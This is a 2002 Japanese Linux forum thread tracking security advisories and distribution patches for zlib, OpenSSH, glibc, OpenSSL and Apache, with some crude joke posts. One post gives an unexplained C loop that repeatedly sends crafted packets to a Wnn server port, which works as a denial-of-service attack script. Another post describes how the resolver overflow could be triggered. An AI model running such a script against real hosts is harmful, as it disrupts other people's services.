1 :
login:Penguin :
02/02/02 13:55 ID:TzxKF1DS
2ゲトー(・∀・)
こうやって並べてみると、Debianが一番対応早いな。 2,3日遅れでRedHat、ついでTurboか。 Vineのatとrsyncの対応はどうなってるんだ?
>>3 うち、Debianじゃないんだけど
apt-get upgrade
をcronさせとけば勝手に埋まりそうで良いなぁ〜
でも、これって「隣の花は赤い」みたいなものかなぁ・・・
5 :
login:Penguin :02/02/02 16:51 ID:pTTak0WL
自動実行すると、設定ファイルがデフォルトに戻ってしまってそれがかえって 穴になってしまうってことは無いのかな?
>>5 DebianだとConffileはどうするか決められるでしょ
>>6 やはり Debian 強いね。
そういうおれは、手動アップの 厨房な夜
cron で upgrade すると対話的な質問のところで止まるという罠。
9 :
login:Penguin :02/02/06 09:06 ID:wzRHhwGZ
2/5 Vine-errata version-up at-3.1.8-23vl0.1.i386.rpm security-hole uucp-1.06.1-31vl0.i386.rpm rsync-2.4.1-2vl1.i386.rpm
10 :
login:Penguin :02/02/06 09:37 ID:z1OnXuT2
Turbolinux 2002-02-01 mozilla 任意のホストのクッキーが不正に取得されてしまう
12 :
login:Penguin :02/02/06 16:18 ID:CGfU8woV
彼女のセキュリティーホールを守るにはどうしたらいいですか?
>>13 予防的手段だけに頼ってはいけない。
インテグリティーチェックと定期的なログ監査。事後対策も忘れずに!
パッチうぉ あてよう
18 :
login:Penguin :02/02/18 21:43 ID:7km2bSU3
at, uucp, ucd-sntpなんて個人でLinuxやってる場合は要らんとおもう
20 :
rrdtool :02/02/18 22:38 ID:e0R/XIhl
net-snmp 4.2.3をtar玉から入れてる人は snmpnetstatのfixパッチも当てたほうがエエぞ fixパッチはredhatのSRPMから頂くとよろし
21 :
login:Penguin :02/02/18 23:03 ID:xV7FaOh2
uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。 ともかく、RPM系のディストリビューションで、「全部」とかで インストールしてると、入ってる可能性大だから、用チェック かとおもうですはい。
ipchainsの設定をしてみました。この設定はどうでしょうか? # ipchains -nL Chain input (policy ACCEPT): target prot opt source destination ports fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a Chain forward (policy DENY): target prot opt source destination ports MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a Chain output (policy ACCEPT): Chain fw (1 references): target prot opt source destination ports ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25 ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023 ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023 DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023 DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
24 :
login:Penguin :02/03/03 12:18 ID:SZmEd9Su
25 :
login:Penguin :02/03/07 15:55 ID:cquF55ex
3/6 Vine-errata security hole squid-2.3.STABLE5-0vl2.i386.rpm
26 :
zlib! :02/03/12 16:41 ID:UaXqoxZ1
27 :
login:Penguin :02/03/12 21:43 ID:lpFBAfJZ
zlib祭り会場はどこですか?
29 :
login:Penguin :02/03/12 23:21 ID:11TI6bf4
ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?
31 :
sage :02/03/13 00:41 ID:mlfLGoSb
32 :
login:Penguin :02/03/13 02:02 ID:Rw4EvJaU
3/12 Vine-errata security hole openssh-2.9.9p2-0vl0.3.i386.rpm openssh-clients-2.9.9p2-0vl0.3.i386.rpm openssh-server-2.9.9p2-0vl0.3.i386.rpm openssh-askpass-2.9.9p2-0vl0.3.i386.rpm
33 :
login:Penguin :02/03/13 08:10 ID:P2nMMkSR
げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。 ブラウザ経由の攻撃もできるのかなぁ... (不正なPNG送るとかで)
mod_gzipとかやばそうだね
35 :
名無しさん@Emacs :02/03/13 10:03 ID:uVnzr98W
>>33 まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。
pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない
だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい)
だろうから、あまり大きな問題にはならないだろうけど。
36 :
zlib! :02/03/13 11:47 ID:zAIB51rk
bugtraqに出てたH D Moore氏のpngの画像を XEmacsでプレビューしたらXEmacsが落ちたYO!
37 :
zlib! :02/03/13 11:54 ID:zAIB51rk
>>36 他力本願で申し訳ないが、coreとか調べてみました?
結局どーなってどーなっちゃうのかよくわからんもので・・・。
stackoverflowと同様だと思ってればいいのかな〜
apache って root で動かすとやばいの?
41 :
zlib! :02/03/14 11:03 ID:Ok5u5E1d
>>38 XEmacs(bamboo)はsignal 11で落ちたみたい
coreはあるけどgdb扱える能力無いのよ。すまん
で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!
43 :
login:Penguin :02/03/21 09:18 ID:l6UXxXqO
3/21 Vine-errata security hole zlib-1.1.3-25vl0.i386.rpm zlib-devel-1.1.3-25vl0.i386.rpm cvs-1.11.1p1-7vl0.i386.rpm dump-0.4b19-5.6x.1.i386.rpm dump-static-0.4b19-5.6x.1.i386.rpm kernel-2.2.19-0vl0.24.i386.rpm kernel-2.2.19-0vl0.24.i586.rpm kernel-2.2.19-0vl0.24.i686.rpm kernel-BOOT-2.2.19-0vl0.24.i386.rpm kernel-doc-2.2.19-0vl0.24.i386.rpm kernel-headers-2.2.19-0vl0.24.i386.rpm kernel-ibcs-2.2.19-0vl0.24.i386.rpm kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm kernel-smp-2.2.19-0vl0.24.i386.rpm kernel-smp-2.2.19-0vl0.24.i586.rpm kernel-smp-2.2.19-0vl0.24.i686.rpm kernel-source-2.2.19-0vl0.24.i386.rpm kernel-utils-2.2.19-0vl0.24.i386.rpm rmt-0.4b19-5.6x.1.i386.rpm rpm-3.0.6-0vl2.1.i386.rpm rpm-build-3.0.6-0vl2.1.i386.rpm rpm-devel-3.0.6-0vl2.1.i386.rpm rpm-python-3.0.6-0vl2.1.i386.rpm popt-1.5.1-0vl2.1.i386.rpm rsync-2.4.1-2vl2.i386.rpm sash-3.4-2vl0.i386.rpm info-4.0-5vl0.i386.rpm texinfo-4.0-5vl0.i386.rpm
44 :
login:Penguin :02/03/21 09:18 ID:l6UXxXqO
3/21 Vine-errata security hole apache-1.3.23-0vl0.1.i386.rpm apache-devel-1.3.23-0vl0.1.i386.rpm apache-manual-1.3.23-0vl0.1.i386.rpm mod_ssl-2.8.7-0vl0.1.i386.rpm fileutils-4.0x-1vl4.i386.rpm
45 :
login:Penguin :02/04/05 12:26 ID:ikMkS74J
04/04 Vine-errata security hole XFree86-3.3.6-13vl28.1.i386.rpm XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm XFree86-8514-3.3.6-13vl28.1.i386.rpm XFree86-AGX-3.3.6-13vl28.1.i386.rpm XFree86-FBDev-3.3.6-13vl28.1.i386.rpm XFree86-I128-3.3.6-13vl28.1.i386.rpm XFree86-Mach32-3.3.6-13vl28.1.i386.rpm XFree86-Mach64-3.3.6-13vl28.1.i386.rpm XFree86-Mach8-3.3.6-13vl28.1.i386.rpm XFree86-Mono-3.3.6-13vl28.1.i386.rpm XFree86-P9000-3.3.6-13vl28.1.i386.rpm XFree86-S3-3.3.6-13vl28.1.i386.rpm XFree86-S3V-3.3.6-13vl28.1.i386.rpm XFree86-SVGA-3.3.6-13vl28.1.i386.rpm XFree86-VGA16-3.3.6-13vl28.1.i386.rpm XFree86-W32-3.3.6-13vl28.1.i386.rpm XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm XFree86-Xnest-3.3.6-13vl28.1.i386.rpm XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm XFree86-devel-3.3.6-13vl28.1.i386.rpm XFree86-doc-3.3.6-13vl28.1.i386.rpm XFree86-libs-3.3.6-13vl28.1.i386.rpm XFree86-xfs-3.3.6-13vl28.1.i386.rpm
46 :
login:Penguin :02/04/11 21:08 ID:n5epu8MN
04/11 Vine-errata security hole squid-2.3.STABLE5-0vl4.i386.rpm
47 :
名無しさん :02/04/12 15:15 ID:357cbhyA
ぼくの肛門も埋めてください
48 :
login:Penguin :02/05/14 10:29 ID:nCRPXE+h
05/14 Vine-errata security hole sudo-1.6.3p6-0.6vl3.i386.rpm
apt-get update apt-get upgrade だけでは不十分ですか?
age忘れ。
51 :
login:Penguin :02/06/03 00:38 ID:ecxsuEIo
僕のチンポの先も埋めてください
52 :
login:Penguin :02/06/03 00:54 ID:Yo9snOlP
>apt-get update >apt-get upgrade > >だけでは不十分ですか? ヴァカじゃん。そういう姿勢がそもそもsecurity hole
53 :
login:Penguin :02/06/06 13:09 ID:H4e/6DmJ
06/06 Vine-errata security hole fetchmail-5.9.11-0vl1.i386.rpm imap-2001a-10vl1.i386.rpm imap-devel-2001a-10vl1.i386.rpm bzip2-1.0.1-3vl3.i386.rpm bzip2-devel-1.0.1-3vl3.i386.rpm
54 :
login:Penguin :02/06/13 09:25 ID:+8hN98ol
06/13 Vine-errata security hole tcpdump-3.6.2-13vl1.i386.rpm libpcap-0.6.2-13vl1.i386.rpm arpwatch-2.1a11-13vl1.i386.rpm
55 :
login:Penguin :02/06/18 15:41 ID:Y4ljwPvb
57 :
login:Penguin :02/06/19 23:43 ID:APWNucgQ
06/19 Vine-errata security hole apache-1.3.26-0vl1.i386.rpm apache-devel-1.3.26-0vl1.i386.rpm apache-manual-1.3.26-0vl1.i386.rpm mod_ssl-2.8.9-0vl1.i386.rpm
58 :
login:Penguin :02/06/20 10:16 ID:01vvi0s8
59 :
login:Penguin :02/06/20 10:44 ID:gutuxgNU
60 :
login:Penguin :02/06/20 13:37 ID:RkoCmceO
Apache のそれは 32bit Linux でもヤバそう。 某MLにexploitが流れてた。
61 :
login:Penguin :02/06/20 13:56 ID:gutuxgNU
62 :
login:Penguin :02/06/20 14:06 ID:RkoCmceO
64 :
名無しさん :02/06/22 23:55 ID:STj3pUTJ
「くだ質」とどちらに投げようか迷った挙げ句、こちらに 投げることにしました。 以下のような自分の使用状況がセキュリティの面で安全か どうか伺いたく存じます。 自宅でLinuxを使っています。Flets ADSLを契約しており、 常時接続ではなく、時々インターネットに接続して電子 メールを読み書きしたり、WWWで情報を得たりしています。 ルータ等は使っていません。他のホストにwwwやftpで クライエントとして接続することはあっても、自ホストを サーバにする必要は殆どないと考えています。ただ例外で、 smtpサーバとしてnullmailerを使っています。 Debian GNU/Linux sidを使っており、電源を入れる度に apt-getでパッケージを更新しています。 ftpd、rsh-server、ssh、apache等は削除しています。 kernelは2.4.18です。 /etc/hosts.allowは何も記述せず、 /etc/hosts.denyはALL: ALLにしてます。 # netstat --tcp --all は、 Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態 tcp 0 0 *:time *:* LISTEN tcp 0 0 *:32927 *:* LISTEN tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、 aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。
>>64 > 以下のような自分の使用状況がセキュリティの面で安全か
> どうか伺いたく存じます。
「安全」と「安全でない」の2つしか状態がないと思ってる?
66 :
login:Penguin :02/06/23 00:47 ID:knGXFfYf
67 :
login:Penguin :02/06/23 01:02 ID:kepzSriJ
>>66 充分に気をつけているほうだと思うよ。
でもセキュリティにこれで完璧ってのは無いんだよ。
あくまでコストとリスクとの綱引きでしかない。
しかしそれで侵入されたからって君を責める人はあまりいないだろう。
69 :
login:Penguin :02/06/25 15:34 ID:drybiZ1b
OpenSSH に新たな弱点発見。詳細は来週まで秘密。 リモートから悪用可能らしい。 3.3 にも同じ弱点があるが、侵入は防げるそうだ。
void writei(int fd,int num){num = htonl(num);write(fd,&num,4);} void writes(int fd,char *s){write(fd,s,strlen(s)+1);} void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd; char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr)); si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0); writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}
71 :
login:Penguin :02/06/25 22:46 ID:LJSlbrtr
>70 Wnnか?何の穴よ? まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。
74 :
login:Penguin :02/06/26 22:51 ID:knPs+H7Y
75 :
login:Penguin :02/06/27 00:16 ID:UFWmO8g6
ISS から OpenSSH のアドバイザリが出た。 Challenge and Response 認証にバグ。remote root exploit。 sshd_config に ChallengeResponseAuthentication no で回避可能。3.4 で修正されている。 これがもし Theo の言ってた穴と同じものなら、 OpenSSH 3.0 以降にのみ存在する穴じゃん。 いちはやくアップデート出した Debian potato は踊らされただけか。
76 :
login:Penguin :02/06/27 00:18 ID:UFWmO8g6
77 :
login:Penguin :02/06/27 00:19 ID:UFWmO8g6
78 :
login:Penguin :02/06/27 00:31 ID:UFWmO8g6
>>75 訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。
Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある
3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。
フルディスクロージャってやっぱり大事なんだな。
79 :
login:Penguin :02/06/27 01:53 ID:b3kvzA+X
06/27 Vine-errata security hole openssh-3.3p1-0vl10.i386.rpm openssh-server-3.3p1-0vl0.i386.rpm openssh-clients-3.3p1-0vl0.i386.rpm openssh-askpass-3.3p1-0vl0.i386.rpm openssh-askpass-gnome-3.3p1-0vl0.i386.rpm
81 :
login:Penguin :02/06/27 11:42 ID:/viQ/aAY
openssh 3.4p1出てるよage
syslogdが大きい。
83 :
login:Penguin :02/06/27 16:56 ID:QDJgHCs7
resolver のバグは対岸の火事ではない模様。
2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。
>>84 まさに大火事のようで(藁
まあ、リモートからいじれる穴ではないだろうけど
86 :
login:Penguin :02/06/27 18:57 ID:QDJgHCs7
>>85 resolver のバグはリモートからいじれる。
攻撃者は自由に設定出来るネームサーバを持っていればいい。
ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。
そしてその IP アドレスから攻撃対象のサーバに接続する。
攻撃対象のサーバが逆引きを行い、
返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。
glibcには*BSDよりも1箇所余計にチェックが入っているが、 これでは防げないのか?
OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に This platform does not support both privilege separation and compression Compression disabled こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。 ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d)
89 :
:02/06/27 20:37 ID:oX2io58x
90 :
login:Penguin :02/06/27 20:41 ID:QDJgHCs7
>>87 実際テストしてみたが落せない。
俺がヘボなだけかもしれないから識者の意見を待とう。
91 :
88 :02/06/27 20:42 ID:GRjz2eTH
>>89 sshd_configのCompressをnoに指定したら出なくなったよ。
感謝。
>>90 FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの
パッチと同じ処理が入っている。getnetnamadr.cにはない。
93 :
login:Penguin :02/06/27 21:00 ID:QDJgHCs7
>>90 識者の意見が間違ってた Aapche の時のような事もあるから
itojun 氏のパッチあててもいいかもしれない。
でも勇み足で必要でないアップデートを出して、わざわざ穴を
開けてしまったDebian potato の例もあるし、悩ましいところだな。
94 :
login:Penguin :02/06/27 21:13 ID:QDJgHCs7
識者登場age。
直すべきは nss_dns/dns-network.c か。 古いの見てた。すまそ。
96 :
login:Penguin :02/06/28 11:19 ID:CALm/HoI
新しいBINDが出た
>>93 itojunさんのパッチってどこでgetできます?
glibcに当たるのかいな?
98 :
login:Penguin :02/06/28 16:13 ID:DZqksx+C
>>97 FreeBSD や NetBSD の Advisory 嫁。
そのままでは当たらないだろうから手作業で当てれ。
ま、俺はめんどいから様子見。
つーか、おまえら誰もglibcのコード読んでないんとちゃうか?
--- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900 +++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900 @@ -328,7 +328,9 @@ } cp += n; *alias_pointer++ = bp; - bp += strlen (bp) + 1; + n = strlen(bp) + 1; + bp += n; + linebuflen -= n; result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC; ++have_answer; } こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の 処理がすでに入っている。
102 :
login:Penguin :02/06/29 04:06 ID:uLF75Z2Y
>>79 Vine-errata security hole
openssh-3.4p1-0vl2.i386.rpm
openssh-server-3.4p1-0vl2.i386.rpm
openssh-clients-3.4p1-0vl2.i386.rpm
openssh-askpass-3.4p1-0vl2.i386.rpm
openssh-askpass-gnome-3.4p1-0vl2.i386.rpm
http://www.sendmail.org/8.12.5.html > 8.12.5/8.12.52002/06/25
> SECURITY: The DNS map can cause a buffer overflow if the user
> specifies a dns map using TXT records in the configuration
> file and a rogue DNS server is queried. None of the
> sendmail supplied configuration files use this option hence
> they are not vulnerable. Problem noted independently by
> Joost Pol of PINE Internet and Anton Rang of Sun Microsystems.
普通の設定では影響なし、なのかな?
上のパッチ、だれかUlrich Drepperに投げた?
107 :
地獄狂 YahooBB219017000159.bbtec.net ◆7WP8X9hw :02/07/02 13:39 ID:hdi7nBII
よくわかんないんだけど、glibcのバグはどのバージョンにあるの?
>>57 07/02 Vine-errata security hole
apache-1.3.26-0vl2.i386.rpm
apache-devel-1.3.26-0vl2.i386.rpm
apache-manual-1.3.26-0vl2.i386.rpm
mod_ssl-2.8.9-0vl2.i386.rpm
110 :
login:Penguin :02/07/04 14:07 ID:nB1GJwB4
>>109 投稿した人は「僕の inbox に入ってた」って言ってた。
112 :
login:Penguin :02/07/07 01:03 ID:BITbiOEM
snortのalert(警告)をメールで携帯に送りたいんですが、 どのようにすれば良いのでしょうか。 confファイルにはそれらしき箇所が見つかりませんでした。
113 :
login:Penguin :02/07/07 01:06 ID:puqWG/eL
>>112 snort 単体ではできない。
syslog と swatch 等を使うか、snort 用のツールを使う。
114 :
112 :02/07/07 02:22 ID:BITbiOEM
115 :
login:Penguin :02/07/08 00:56 ID:/S0ObH45
NetSNMPとMRTGでサーバを監視しようと思ってるんですが、 MRTGに関してはローカルホスト(NetSNMPが入ってるマシン)を対象に 監視を行っても良いのでしょうか。 なんか説明ページだと、ルータが監視の対象となってるみたいなんですが。 (ルータがSNMPに対応していないので…)
117 :
login:Penguin :02/07/08 21:11 ID:u3KFO/Rs
07/08 Vine-errata security hole squid-2.4.STABLE7-0vl1.i386.rpm
ttp://lwn.net/Articles/4545/ This bug has been fixed for the gethostbyXXX class of functions
in GNU libc in 1999. Unfortunately, there is similar code in the
getnetbyXXX functions in recent glibc implementations, and
the code is enabled by default. However, these functions are
used by very few applications only, such as ifconfig and ifuser,
which makes exploits less likely.
やはり....
最近新しい穴が見つからないねぇ。 いいことなんだが、何かつまらんw
121 :
login:Penguin :02/07/22 23:24 ID:/iXwHkpN
キタ━━━━━━(゚∀゚)━━━━━━ !!! PHP 4.2.0/4.2.1 に任意コード実行可能なセキュリティホール。 また IA32 じゃ任意コード実行は出来ないなんて言ってるよ。 ホントカナー???
122 :
login:Penguin :02/07/26 10:13 ID:GbcCcnsG
Updated glibc packages fix vulnerabilities in resolver
http://rhn.redhat.com/errata/RHSA-2002-139.html > A buffer overflow vulnerability has been found in the way the glibc
> resolver handles the resolution of network names and addresses via DNS (as
> per Internet RFC 1011). Version 2.2.5 of glibc and earlier versions are
> affected. A system would be vulnerable to this issue if the
> "networks" database in /etc/nsswitch.conf includes the "dns" entry. By
> default, Red Hat Linux ships with "networks" set to "files" and
> is therefore not vulnerable to this issue. (CAN-2002-0684)
>
> A second, related, issue is a bug in the glibc-compat packages, which
> provide compatibility for applications compiled against glibc version
> 2.0.x. Applications compiled against this version (such as those
> distributed with early Red Hat Linux releases 5.0, 5.1, and 5.2) could also
> be vulnerable to this issue. (CAN-2002-0651)
>
> These errata packages for Red Hat Linux 7.1 and 7.2 on the Itanium
> architecture also include a fix for the strncpy implementation in some
> boundary cases.
123 :
名無しさん@Emacs :02/07/26 12:55 ID:WWUr2yVC
>>120 良いことではないか。ないにこしたことはない。
124 :
login:Penguin :02/07/29 12:39 ID:6tjxSffv
Jul 29 02:47:04 XXXXX sshd[14409]: warning: /etc/hosts.allow, line 6: can't verify hostname: gethostbyname(host180.cciglobal.net.pa) failed これはresolverの穴を狙った攻撃?
接続元のIPアドレスからホスト名を調べて、そこからまたIPアドレスを
ひいたら元に戻らなかった、ってことだと思う。
>>124 のものも、
うちに来ているものも、DNSでAレコードがひけないんだよね。
Jul 28 04:45:35 giko sshd[80120]: warning: /etc/hosts.allow, line 4: can't verify hostname: getaddrinfo(h64-141-4-23.bigpipeinc.com, AF_INET) failed
Jul 28 04:45:35 giko sshd[80120]: refused connect from 64.141.4.23 (64.141.4.23)
% host 64.141.4.23
23.4.141.64.in-addr.arpa domain name pointer h64-141-4-23.bigpipeinc.com.
% host h64-141-4-23.bigpipeinc.com
Host h64-141-4-23.bigpipeinc.com not found: 3(NXDOMAIN)
詳しく調べたわけでないから嘘かもしれぬ。スマソ。
126 :
login:Penguin :02/07/29 18:09 ID:qwCj4iNe
>>124 攻撃そのものは単純にsshdの古いバージョンでのセキュリティホール
を狙った物だと思う。偶然にもIPから逆引きできたホスト名と、その
ホスト名に対応するIPが合致していなかったために拒否されただけ。
127 :
login:Penguin :02/07/30 23:43 ID:OrlpKdAp
マタキタ━━━━━━(゚∀゚)━━━━━━ !!! OpenSSL にリモートから悪用可能なバッファオーバフロー。 既に赤帽と Woody には修正出た。でも Potato はまだ。 util-linux にもちっこい穴。
128 :
login:Penguin :02/07/31 11:36 ID:RHIhvYC4
129 :
login:Penguin :02/07/31 13:00 ID:4XI2cpUc
Vine Linux 2.5/2.1.5 向け修正キタ━━(゚∀゚)━━━!!!!! ・2002,07,31 openssl にセキュリティホール
130 :
login:Penguin :02/07/31 14:06 ID:ihwnQ9C/
07/31 Vine-errata security hole openssl-0.9.6b-1vl5.i386.rpm openssl-devel-0.9.6b-1vl5.i386.rpm openssl-perl-0.9.6b-1vl5.i386.rpm
131 :
login:Penguin :02/07/31 20:42 ID:YlVAcS0a
Turboにglibc、imap、artsのパッチ出てます。
132 :
login:Penguin :02/07/31 22:04 ID:VJrOgCEJ
openss-0.9.6eをmake installしたら /usr/bin/pod2manがうまくいかね−とか言って 「自前の古いやつで代用しとくよん」とか言われるんだが perlはperl-5.00503-12が入っている /usr/bin/pod2manは 29017 Aug 11 2000 /usr/bin/pod2man 赤帽6.2, kernel2.2.19-6.2.16 なんで?
133 :
login:Penguin :02/07/31 22:23 ID:Q67jwc8B
>>131 imap のってかなり前から判明してて悪用ツールも出回ってるのに、
赤帽は無視状態なんだよなぁ。
>>132 鷲もSolaris8(SPARC版)で同じようなエラーでまくった。
>>132 FreeBSD 4.6-STABLEで同じエラーが出たが,
PlamoLinux 2.2.6では出なかった
136 :
135 :02/08/01 05:03 ID:K+qKORMj
ちなみに FreeBSD: -r-xr-xr-x 1 root wheel 29017 Sep 26 2000 /usr/bin/pod2man Linux: -rwxr-xr-x 1 root root 28830 Jul 23 1999 /usr/bin/pod2man*
137 :
OpenSSHにトロイ :02/08/02 00:12 ID:INRnoZ0d
138 :
132 :02/08/02 11:13 ID:ODee0oiA
ヨー分からんが、どうせマニュアルだしとおもって
とりあえず無視して続行した
情報あんがと
>>134 , 135
139 :
login:Penguin :02/08/02 11:37 ID:Ybd6oZe9
>137 祭りのヨカーン うちは大丈夫だったーよ。
140 :
名無しさん@Emacs :02/08/02 12:53 ID:00MO2/Lt
141 :
login:Penguin :02/08/02 13:02 ID:1fOWog9y
因紫 掻 薄仙 尻衣馬形壱 馬澗 紫戚闘拭 奄沙 凪戚走亜 蒸柔艦陥. 穣益傾戚球馬澗 掻析 呪 赤柔艦陥. 陥製拭 陥獣 背左淑獣神. 庚薦亜 域紗鞠檎 瀬 紫戚闘 淫軒切拭惟 庚税馬淑獣神. これってなんて書いてあるの?ルータのログみたら外からローカルの アドレス参照しようとしてたみたいなんだけど。
142 :
141 :02/08/02 13:03 ID:1fOWog9y
参照元のURL見に行ったら書いてあった。
143 :
login:Penguin :02/08/02 20:01 ID:8Z+yUGrL
144 :
login:Penguin :02/08/02 20:07 ID:8Z+yUGrL
cvsは変更されている。
145 :
login:Penguin :02/08/02 20:42 ID:Fjm5fo+C
>>143 俺的にはネットに sunrpc を露出させてる事自体が非常識だと思うが、
実際にはそういう鯖がいっぱいあるんだろうな。
Debian ですらデフォルトで sunrpc が動いてる。
146 :
login:Penguin :02/08/03 22:31 ID:iNHan/6D
>>145 libwrap組み込みのportmapperはまだマシ。
Solarisのやつはアクセス制限ないからね
>>145 ルータで塞いでるから、ネットに晒してるのはあまり無い気がするが、
それでも内部からだと叩かれまくるよな。
148 :
login:Penguin :02/08/03 23:03 ID:q+uK3qOu
ガーソ。NFS鯖もだめっぽ?
Port111、iptablesでrejectしとこっと
150 :
login:Penguin :02/08/08 08:04 ID:GKTZUhh4
08/07 Vine-errata security hole apache-1.3.26-0vl3.i386.rpm apache-devel-1.3.26-0vl3.i386.rpm apache-manual-1.3.26-0vl3.i386.rpm mod_ssl-2.8.7-0vl3.i386.rpm
151 :
login:Penguin :02/08/08 08:06 ID:GKTZUhh4
08/07 Vine-errata security hole libpng-1.0.12-0vl3.i386.rpm libpng-devel-1.0.12-0vl3.i386.rpm
152 :
OpenSSL0.9.6f :02/08/09 14:31 ID:BghTOrfj
あぼーん
154 :
login:Penguin :02/08/09 14:59 ID:4tlTdlJW
>>152 またopensslに依存するのをビルドしなおしかよ・・メンドクセー
155 :
OpenSSL0.9.6f :02/08/09 15:10 ID:BghTOrfj
>>154 朝からWin2kのSP3(板違いスマソ)もいれたし、
次はコレかよって感じだよ....ウワヮヮン ヽ(`Д´)ノ
あうん。 OpenSSL は、ちと面倒だよね。。。
157 :
login:Penguin :02/08/09 15:21 ID:8WrLJci1
158 :
:02/08/09 19:13 ID:o+8My8IY
地味なタコ式祭りが発生しているが... 当面 RSA には影響なさげ。
>素数判定(が困難であること)は、RSAをはじめとする... RSA の基盤は「素因数分解(が困難であること)」だバカモノ。
>>160 素数判定は楽にできるようになったけど、
依然として素因数分解は困難であるということ?
>>161 アルゴリズムを素因数分解に応用できるかどうかは今の所未知数。
ていうか今のところ関係無し。でも数学好きにはたまらんネタだろうな。
>>162 ども。
とりあえず、あわてることはなさそうですね。
こういう時数学的素養がない漏れはツライ...
8月中に色々出そうなヨカーン
166 :
login:Penguin :02/08/11 05:59 ID:cqQ7h8Qr
opensslは0.9.6gか・・・ この手のライブラリは頻繁にバージョンアップされたら泣けてくる・・・ 今、0.9.6e使ってるんだけど、セキュリティ問題あんのかな? うちではbuildは素直に通ったんだけど・・・これ絡みの修正なら放置したい・・・
167 :
login:Penguin :02/08/11 08:43 ID:uKejT2NS
168 :
166 :02/08/11 15:42 ID:cqQ7h8Qr
>>167 THX
アップデートしておいた方がよさげかな(泣
もう、openssl0.9.6gでてるよ。 opensshとかapacheとか、makeしなおしかよー
sharedでmakeしてるときって、再起動だけでいいんですか? ldd /usr/sbin/sshd してみたら、 libcrypto.so.3 => /usr/lib/libcrypto.so.3 (0x280d0000) という風になってて、 このlibcrypto.so.3 は古いライブラリだったんですよね。 新しいのは libcrypto.so.2 なんですけど・・・・
海胆板とクロスポストかよ おめでてえな
174 :
login:Penguin :02/08/13 22:00 ID:Lm+jD2sp
>>171 お前馬鹿だなぁ。ダイナミックリンクでも新しいバージョン入れて再起動しないとダメだよ。
175 :
login:Penguin :02/08/13 23:10 ID:OgpeoNS6
>>172 入れ換えて再起動するだけでいい。そのためのシェアードライブラリ。
そのへんがよく判ってない人は RPM に頼るほうが安全だよ。
rpm だと, シェアードライブラリを入れ変えると, link してる daemon を再起動してくれるもんなの? なんかすごそう.
178 :
login:Penguin :02/08/14 00:33 ID:zJGAdpS8
>>176 いや、そこまではやってくれないよ。
シェアードにしたつもりで出来てなかった、とかの失敗が無くなるだけ。
それに
>>177 が書いてるように、アドバイザリに必要な作業が載る。
でも Debian で glibc 入れ換えると片っ端から再起動してくれて驚く。
>178 /sbin/init も?
180 :
login:Penguin :02/08/14 11:21 ID:xh4yp2uP
>>179 Debian で /sbin/init を再起動してくれるかどうかは確かめてない。
でも赤帽でも init は再起動してくれるくらいだから、やってるんじゃない?
>>179 postinst で init u してるのを発見
182 :
login:Penguin :02/08/25 02:51 ID:u07j5rfK
08/15 Vine-errata security hole mozilla-1.0.0-9vl9.i386.rpm mozilla-chat-1.0.0-9vl9.i386.rpm mozilla-devel-1.0.0-9vl9.i386.rpm mozilla-dom-inspector-1.0.0-9vl9.i386.rpm mozilla-js-debugger-1.0.0-9vl9.i386.rpm mozilla-mail-1.0.0-9vl9.i386.rpm mozilla-nspr-1.0.0-9vl9.i386.rpm mozilla-nspr-devel-1.0.0-9vl9.i386.rpm mozilla-nss-1.0.0-9vl9.i386.rpm mozilla-nss-devel-1.0.0-9vl9.i386.rpm mozilla-psm-1.0.0-9vl9.i386.rpm
183 :
login:Penguin :02/08/25 02:51 ID:u07j5rfK
